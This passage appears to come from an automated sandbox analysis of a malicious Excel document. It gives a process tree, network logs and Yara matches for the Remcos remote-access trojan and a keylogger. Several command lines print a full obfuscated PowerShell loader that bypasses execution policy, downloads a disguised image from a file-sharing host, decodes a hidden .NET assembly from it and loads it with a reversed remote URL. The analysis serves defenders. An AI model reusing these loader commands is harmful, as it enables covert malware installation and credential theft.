                                                                                                                                                                                2024-11-25 13:07:01 UTC8192INData Raw: d2 a3 93 22 a8 5d c5 95 94 5f 03 76 e0 4f f2 ff 00 87 3a 10 95 24 93 ac 85 59 58 23 21 00 06 1c 8e 3d ac 8f cf 15 77 2e cc cc 6c 93 66 85 5e 05 c6 dd a4 ee 50 2d 7d fd 8e 18 6a 21 54 e0 7f 19 3b 41 20 d5 11 d7 eb 89 76 eb 91 58 0d 3c 81 82 aa 05 04 6e e9 7d 08 f8 e1 a0 96 34 68 dc 95 b0 56 e8 10 78 20 f2 3a 11 43 b7 38 87 d7 0b 02 87 99 11 88 00 b0 04 93 54 30 1d d4 4f 13 ce cc 0a 12 5c 37 01 8d ed be 0d fb fc 30 0d 2a f9 d1 48 68 81 b4 ba 8b ea 38 3f 98 17 f5 c0 48 8c 8c ca c2 98 1a 3c df c7 05 58 1a 49 3c 40 20 b5 4a 0e 4e c0 c7 aa d0 06 fb df d3 20 48 8f 13 2f 99 c2 c5 44 80 7a 97 07 8b e7 11 50 b7 c9 20 51 e9 90 7a 57 eb 80 db ca ad 1b ad d9 2c 9d 01 e4 05 20 9f ce b0 53 32 bd b2 b5 92 ec 7e 9c 56 2f 59 74 0c cc 15 41 26 fa 60 3b 29 54 12 13 20 2c d0
                                                                                                                                                                                Data Ascii: "]_vO:$YX#!=w.lf^P-}j!T;A vX<n}4hVx :C8T0O\70*Hh8?H<XI<@ JN H/DzP QzW, S2~V/YtA&`;)T ,


Session ID:5
Source IP:192.168.2.22
Source Port:49172
Destination IP:193.30.119.205
Destination Port:443
PID:3964
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-25 13:07:16 UTC | 211 | OUT | GET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1
Host: 3105.filemail.com
Connection: Keep-Alive
2024-11-25 13:07:17 UTC | 328 | IN | HTTP/1.1 200 OK
Content-Length: 2230233
Content-Type: image/jpeg
Last-Modified: Mon, 25 Nov 2024 10:41:01 GMT
Accept-Ranges: bytes
ETag: 67ad55be8fbd7389b2f5ef2b123a44b4
X-Transfer-ID: ibybhsntnwgamsn
Content-Disposition: attachment; filename=new_imagem-vbs.jpg
Date: Mon, 25 Nov 2024 13:07:15 GMT
Connection: close



                                                                                                                                                                                Target ID:0
                                                                                                                                                                                Start time:08:06:09
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                                                                                                Imagebase:0x13f5f0000
                                                                                                                                                                                File size:28'253'536 bytes
                                                                                                                                                                                MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                Target ID:4
                                                                                                                                                                                Start time:08:06:36
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                                                                                                                Imagebase:0x13ff40000
                                                                                                                                                                                File size:13'824 bytes
                                                                                                                                                                                MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                Target ID:5
                                                                                                                                                                                Start time:08:06:42
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'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'+[ChAR]0x22+'))')))"
                                                                                                                                                                                Imagebase:0x13f8a0000
                                                                                                                                                                                File size:443'392 bytes
                                                                                                                                                                                MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                Target ID:8
                                                                                                                                                                                Start time:08:06:44
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE
                                                                                                                                                                                Imagebase:0x13f8a0000
                                                                                                                                                                                File size:443'392 bytes
                                                                                                                                                                                MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                Target ID:9
                                                                                                                                                                                Start time:08:06:47
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.cmdline"
                                                                                                                                                                                Imagebase:0x13f040000
                                                                                                                                                                                File size:2'758'280 bytes
                                                                                                                                                                                MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                Target ID:10
                                                                                                                                                                                Start time:08:06:47
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3100.tmp" "c:\Users\user\AppData\Local\Temp\b53lag2c\CSCFF6E95784C84671B5586A4811C47.TMP"
                                                                                                                                                                                Imagebase:0x13f560000
                                                                                                                                                                                File size:52'744 bytes
                                                                                                                                                                                MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                Target ID:12
                                                                                                                                                                                Start time:08:06:53
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatgoodideaforfuturebusinessdevelopwithnicethin.vBs"
                                                                                                                                                                                Imagebase:0xff880000
                                                                                                                                                                                File size:168'960 bytes
                                                                                                                                                                                MD5 hash:045451FA238A75305CC26AC982472367
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                Target ID:13
                                                                                                                                                                                Start time:08:06:54
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                                                                                                Imagebase:0x13f8a0000
                                                                                                                                                                                File size:443'392 bytes
                                                                                                                                                                                MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                Target ID:15
                                                                                                                                                                                Start time:08:06:55
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('nErimageUrl = ZM5https://3105.filemail.com/api/file/get?fil'+'ekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-'+'dviTK5cARaNdQ'+'jbb3mexfwQzKmTXg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c Z'+'M5;nErwe'+'bClient = New-Object System.Net.WebC'+'lient;nErimageBytes = nErwebClient.DownloadData('+'nErimageUrl);nErimageText = ['+'System.Text.Encoding]::UTF8.GetStr'+'ing(nErimageBy'+'tes);nErstartFlag ='+' ZM5<<BASE64_START>>ZM5'+';nErendFlag = ZM5<<BASE64_'+'END>>ZM5;nErstartIndex = nErimageTex'+'t.IndexOf(nErstartFlag);nErendInd'+'ex = nErimageText.IndexOf('+'nErendFlag);nE'+'rstartIn'+'dex -ge 0 -and nErendIndex -gt nErstartIndex;nErstartIndex += nErstartFlag.Length;nErbase64'+'L'+'ength = nErendInde'+'x - nErsta'+'rtIndex;nErbase64Command = nErimageText.Substring(nErstartIndex, nErbase64Length'+');nErbase64Reversed = -join (nErba'+'se64Command.ToCharArray() JI6 ForEach'+'-Object { nEr_ })[-1..-(nErbase64Command.Length)];nErcommandBytes = [System.Convert]::'+'FromBas'+'e64String(nErbase64Reversed);nErloadedAssembly = [System.Reflection.Assembly]::Load(nErcommandBytes);nErvaiMethod = [dnlib.IO.Home].GetMethod'+'(ZM5VAIZM5);nErvaiMethod.Invoke(nErnull, @(ZM5txt.RSRVRS/'+'4421/531.5'+'02.432.271//:ptthZM5, ZM5'+'desativadoZM5, ZM5desativadoZM5, ZM5desativadoZM'+'5, ZM5CasPolZM5, ZM5desativadoZM5, ZM5desativadoZM5,ZM5desativadoZM5,Z'+'M5desativadoZ'+'M5,ZM5desativado'+'ZM'+'5,ZM5desativadoZM5,ZM5desativad'+'oZM5'+',ZM51ZM5,ZM5desativadoZM5));') -RePlacE ([char]110+[char]69+[char]114),[char]36-CReplAcE 'ZM5',[char]39 -RePlacE([char]74+[char]73+[char]54),[char]124)|& ( $pSHOME[4]+$PShOME[30]+'x')"
                                                                                                                                                                                Imagebase:0x13f8a0000
                                                                                                                                                                                File size:443'392 bytes
                                                                                                                                                                                MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                Target ID:16
                                                                                                                                                                                Start time:08:06:56
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                                                                                                                Imagebase:0x13f7a0000
                                                                                                                                                                                File size:13'824 bytes
                                                                                                                                                                                MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                Target ID:18
                                                                                                                                                                                Start time:08:07:02
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'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'+[ChAR]0x22+'))')))"
                                                                                                                                                                                Imagebase:0x13f8a0000
                                                                                                                                                                                File size:443'392 bytes
                                                                                                                                                                                MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                Target ID:20
                                                                                                                                                                                Start time:08:07:03
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE
                                                                                                                                                                                Imagebase:0x13f8a0000
                                                                                                                                                                                File size:443'392 bytes
                                                                                                                                                                                MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                Target ID:21
                                                                                                                                                                                Start time:08:07:04
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ovqlooon\ovqlooon.cmdline"
                                                                                                                                                                                Imagebase:0x13f020000
                                                                                                                                                                                File size:2'758'280 bytes
                                                                                                                                                                                MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                Target ID:22
                                                                                                                                                                                Start time:08:07:05
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES77DF.tmp" "c:\Users\user\AppData\Local\Temp\ovqlooon\CSCADDA0BE83C5E4E17A4EF3CEA725DA.TMP"
                                                                                                                                                                                Imagebase:0x13fcf0000
                                                                                                                                                                                File size:52'744 bytes
                                                                                                                                                                                MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                Target ID:24
                                                                                                                                                                                Start time:08:07:10
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatgoodideaforfuturebusinessdevelopwithnicethin.vBs"
                                                                                                                                                                                Imagebase:0xff500000
                                                                                                                                                                                File size:168'960 bytes
                                                                                                                                                                                MD5 hash:045451FA238A75305CC26AC982472367
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                Target ID:25
                                                                                                                                                                                Start time:08:07:11
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                                                                                                Imagebase:0x13f8a0000
                                                                                                                                                                                File size:443'392 bytes
                                                                                                                                                                                MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                Target ID:27
                                                                                                                                                                                Start time:08:07:12
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('nErimageUrl = ZM5https://3105.filemail.com/api/file/get?fil'+'ekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-'+'dviTK5cARaNdQ'+'jbb3mexfwQzKmTXg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c Z'+'M5;nErwe'+'bClient = New-Object System.Net.WebC'+'lient;nErimageBytes = nErwebClient.DownloadData('+'nErimageUrl);nErimageText = ['+'System.Text.Encoding]::UTF8.GetStr'+'ing(nErimageBy'+'tes);nErstartFlag ='+' ZM5<<BASE64_START>>ZM5'+';nErendFlag = ZM5<<BASE64_'+'END>>ZM5;nErstartIndex = nErimageTex'+'t.IndexOf(nErstartFlag);nErendInd'+'ex = nErimageText.IndexOf('+'nErendFlag);nE'+'rstartIn'+'dex -ge 0 -and nErendIndex -gt nErstartIndex;nErstartIndex += nErstartFlag.Length;nErbase64'+'L'+'ength = nErendInde'+'x - nErsta'+'rtIndex;nErbase64Command = nErimageText.Substring(nErstartIndex, nErbase64Length'+');nErbase64Reversed = -join (nErba'+'se64Command.ToCharArray() JI6 ForEach'+'-Object { nEr_ })[-1..-(nErbase64Command.Length)];nErcommandBytes = [System.Convert]::'+'FromBas'+'e64String(nErbase64Reversed);nErloadedAssembly = [System.Reflection.Assembly]::Load(nErcommandBytes);nErvaiMethod = [dnlib.IO.Home].GetMethod'+'(ZM5VAIZM5);nErvaiMethod.Invoke(nErnull, @(ZM5txt.RSRVRS/'+'4421/531.5'+'02.432.271//:ptthZM5, ZM5'+'desativadoZM5, ZM5desativadoZM5, ZM5desativadoZM'+'5, ZM5CasPolZM5, ZM5desativadoZM5, ZM5desativadoZM5,ZM5desativadoZM5,Z'+'M5desativadoZ'+'M5,ZM5desativado'+'ZM'+'5,ZM5desativadoZM5,ZM5desativad'+'oZM5'+',ZM51ZM5,ZM5desativadoZM5));') -RePlacE ([char]110+[char]69+[char]114),[char]36-CReplAcE 'ZM5',[char]39 -RePlacE([char]74+[char]73+[char]54),[char]124)|& ( $pSHOME[4]+$PShOME[30]+'x')"
                                                                                                                                                                                Imagebase:0x13f8a0000
                                                                                                                                                                                File size:443'392 bytes
                                                                                                                                                                                MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                Target ID:28
                                                                                                                                                                                Start time:08:07:21
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                                                                                                                Imagebase:0x1200000
                                                                                                                                                                                File size:107'704 bytes
                                                                                                                                                                                MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                Target ID:30
                                                                                                                                                                                Start time:08:07:29
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\celvhtcxiwczckrdjzxnvyxm"
                                                                                                                                                                                Imagebase:0x1200000
                                                                                                                                                                                File size:107'704 bytes
                                                                                                                                                                                MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                Target ID:31
                                                                                                                                                                                Start time:08:07:29
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\eyqfiluzweuemqnhakkgfkrdatg"
                                                                                                                                                                                Imagebase:0x1200000
                                                                                                                                                                                File size:107'704 bytes
                                                                                                                                                                                MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                Target ID:32
                                                                                                                                                                                Start time:08:07:30
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oavyjefskmmjowblkvxiixmujzxyrr"
                                                                                                                                                                                Imagebase:0x1200000
                                                                                                                                                                                File size:107'704 bytes
                                                                                                                                                                                MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                Target ID:33
                                                                                                                                                                                Start time:08:07:31
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oavyjefskmmjowblkvxiixmujzxyrr"
                                                                                                                                                                                Imagebase:0x1200000
                                                                                                                                                                                File size:107'704 bytes
                                                                                                                                                                                MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                Target ID:35
                                                                                                                                                                                Start time:08:07:36
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                                                                                                                Imagebase:0x1200000
                                                                                                                                                                                File size:107'704 bytes
                                                                                                                                                                                MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000023.00000002.543234045.0000000000505000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                Module: Sheet1

                                                                                                                                                                                Declaration
                                                                                                                                                                                Attribute VB_Name = "Sheet1"
                                                                                                                                                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                                                                Attribute VB_GlobalNameSpace = False
                                                                                                                                                                                Attribute VB_Creatable = False
                                                                                                                                                                                Attribute VB_PredeclaredId = True
                                                                                                                                                                                Attribute VB_Exposed = True
                                                                                                                                                                                Attribute VB_TemplateDerived = False
                                                                                                                                                                                Attribute VB_Customizable = True

                                                                                                                                                                                Module: Sheet2

                                                                                                                                                                                Declaration
                                                                                                                                                                                Attribute VB_Name = "Sheet2"
                                                                                                                                                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                                                                Attribute VB_GlobalNameSpace = False
                                                                                                                                                                                Attribute VB_Creatable = False
                                                                                                                                                                                Attribute VB_PredeclaredId = True
                                                                                                                                                                                Attribute VB_Exposed = True
                                                                                                                                                                                Attribute VB_TemplateDerived = False
                                                                                                                                                                                Attribute VB_Customizable = True

                                                                                                                                                                                Module: Sheet3

                                                                                                                                                                                Declaration
                                                                                                                                                                                Attribute VB_Name = "Sheet3"
                                                                                                                                                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                                                                Attribute VB_GlobalNameSpace = False
                                                                                                                                                                                Attribute VB_Creatable = False
                                                                                                                                                                                Attribute VB_PredeclaredId = True
                                                                                                                                                                                Attribute VB_Exposed = True
                                                                                                                                                                                Attribute VB_TemplateDerived = False
                                                                                                                                                                                Attribute VB_Customizable = True

                                                                                                                                                                                Module: ThisWorkbook

                                                                                                                                                                                Declaration
                                                                                                                                                                                Attribute VB_Name = "ThisWorkbook"
                                                                                                                                                                                Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                                                                                                                                Attribute VB_GlobalNameSpace = False
                                                                                                                                                                                Attribute VB_Creatable = False
                                                                                                                                                                                Attribute VB_PredeclaredId = True
                                                                                                                                                                                Attribute VB_Exposed = True
                                                                                                                                                                                Attribute VB_TemplateDerived = False
                                                                                                                                                                                Attribute VB_Customizable = True

                                                                                                                                                                                  Memory Dump Source
